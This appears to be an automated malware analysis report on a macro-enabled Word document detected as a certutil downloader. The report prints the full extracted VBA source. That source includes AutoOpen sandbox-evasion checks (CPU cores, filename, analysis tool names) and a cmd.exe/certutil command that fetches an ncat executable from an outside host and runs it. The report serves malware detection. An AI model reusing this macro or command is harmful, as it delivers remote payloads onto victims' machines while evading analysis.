MALICIOUS
430
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1071.001 Web Protocols
T1105 Ingress Tool Transfer
The sample contains VBA macros that execute upon opening, specifically targeting analysis environments by checking for virtual machine artifacts and specific process names. If the environment appears clean, the macro proceeds to execute a command, likely to download and run a secondary payload. The ClamAV detection name 'Win.Downloader.CertutilURLCache-6335698-0' suggests the use of certutil for downloading, aligning with the downloader pattern.
Heuristics 10
-
ClamAV: Win.Downloader.CertutilURLCache-6335698-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Downloader.CertutilURLCache-6335698-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim objShell Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe" -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim objShell Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe" -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48) -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "NewMacros" Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.2.120/ncat1.exe In document text (OOXML body / shared strings)
- http://1�92.168.�In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2398 bytes |
SHA-256: 7a399a1abb88ed4d56552c0089db87ae69d6a2bfc623ff3e645db5a99ca41d00 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim i
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores = True Then
i = 1
Else
checkPreciseFileName
End If
End Sub
Private Function MSG()
'Sub MSG()
MsgBox ("TEST")
End Function
Public Sub checkPreciseFileName()
'MsgBox "[*] Checking Precise Filename ..."
badName = False
If ActiveDocument.Name <> "certutil2_0_58_only_certutil_TEST2_cores_exact_filename_badtask.docm" Then
badName = True
End If
If badName Then
i = 1
'MsgBox "DETECTED"
Else
checkTasks
'MsgBox "OK"
End If
End Sub
Public Sub checkTasks()
'printMsg "[*] Checking Application.Tasks.Name ..."
badTask = False
badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
'badTaskNames = Array("fiddler", "vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer")
'badTaskNames = Array("visual basic")
For Each Task In Application.Tasks
For Each badTaskName In badTaskNames
If InStr(LCase(Task.Name), badTaskName) > 0 Then
badTask = True
End If
Next
Next
If badTask Then
MsgBox "DETECTED"
Else
Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 24576 bytes |
SHA-256: a1c082b6db89851b3509dd347cd9d3b261caefa53b9c6fdc24680fe958a7191e |
|||
|
Detection
ClamAV:
Win.Downloader.CertutilURLCache-6335698-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.